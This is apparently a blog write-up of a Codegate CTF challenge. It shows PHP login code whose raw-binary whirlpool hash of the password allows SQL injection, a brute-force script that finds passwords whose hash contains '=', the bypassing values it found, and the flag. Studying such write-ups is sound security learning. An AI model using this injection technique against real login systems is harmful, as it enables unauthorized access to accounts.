We were given the source code of this challenge. To get the flag we have to login as 'admin'. Below is the php code:
$flag = "/flag.txt";
$id = $_POST['user_id'];
$ps = $_POST['password'];
mysql_connect("localhost","codegate","codegate");
mysql_select_db("codegate");
$id = mysql_real_escape_string($id);
$ps = mysql_real_escape_string($ps);
$ps = hash("whirlpool",$ps, true);
$result = mysql_query("select * from users where user_id='$id' and user_ps='$ps'");
$row = mysql_fetch_assoc($result);
if (isset($row['user_id'])) {
if ($row['user_id'] == "admin") {
echo "hello, admin<br />";
die(file_get_contents($flag));
} else {
die("hello, ".$row['user_id']);
}
} else {
msg("login failed..");
}
The issue with code is that hash() function which outputs raw binary data leading to SQL injection.
string hash ( string $algo , string $data [, bool $raw_output = false ] ) raw_input: When set to TRUE, outputs raw binary data. FALSE outputs lowercase hexits.To bypass the login, we need to find a value that when hashed with whirlpool results in string containing '='
<?php
for($i=0 ;$i<10000000; $i++)
if(strpos(hash("whirlpool",$i, true),"'='") !== false)
echo $i."\n";
?>
[ctf@renorobert CodeGate]# php brute.php 364383 527980 629987 708365 991410 1311789 1608604 1974557 ^CLogging in with the above passwords results in login bypass. The flag for the challenge is DAER0NG_DAER0NG_APPLE_TR33
No comments :
Post a Comment